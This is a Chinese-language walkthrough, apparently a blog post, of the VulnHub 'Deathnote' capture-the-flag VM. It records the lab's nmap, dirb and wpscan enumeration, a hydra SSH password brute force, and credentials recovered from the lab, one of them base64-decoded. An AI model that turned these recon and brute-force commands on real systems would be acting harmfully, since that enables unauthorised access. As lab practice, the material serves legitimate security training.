vulnhub靶场:Deathnote
Kali:172.88.6.144
靶场:172.88.6.92
arp-scan -l
nmap -T4 -sV -P -A 172.88.6.92
访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpress/页面,但是显示404,想着应该是未配置dns的问题。那就配置下dns信息,win:打开C:\Windows\System32\drivers\etc\hosts文件,添加:172.88.6.92 deathnote.vuln。kali:打开/etc/hosts文件,添加:172.88.6.92 deathnote.vuln。即可正常访问页面
翻译过后是这个样子,告诉我们要找到一个note.txt文件并且查看下L的comment
找到一个名字L,用dirb对网站进行扫描
dirb http://172.88.6.92 -X .txt,.html,.php,.bak,.bac,.sql,.php.bac,.jpg
dirb http://172.88.6.92 -r
把照片下载到本地wget http://172.88.6.92/important.jpg
cat important.jpg
点击一下网站上的hint,这里提示找到server上的note.txt或者看L的留言。L的留言应该指的是下面的
“my fav line is iamjustic3”,获得一个密码:iamjustic3
扫描这个ip后,发现一个登录页面dirsearch -u http://172.88.6.92/
执行这条语句的时候,记得kali也要更改hosts
wpscan --url http://deathnote.vuln/wordpress/ -e u
这个应该就是用户名了吧,kira
输入账号,点击this email is correct
将这个文件放到kali中,然后用九头蛇hydra爆破
hydra -l l -P test.txt ssh://172.88.6.92
ssh l@172.88.6.92
i think u got the shell , but you wont be able to kill me -kira
cGFzc3dkIDoga2lyYWlzZXZpbCA=
passwd : kiraisevil
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?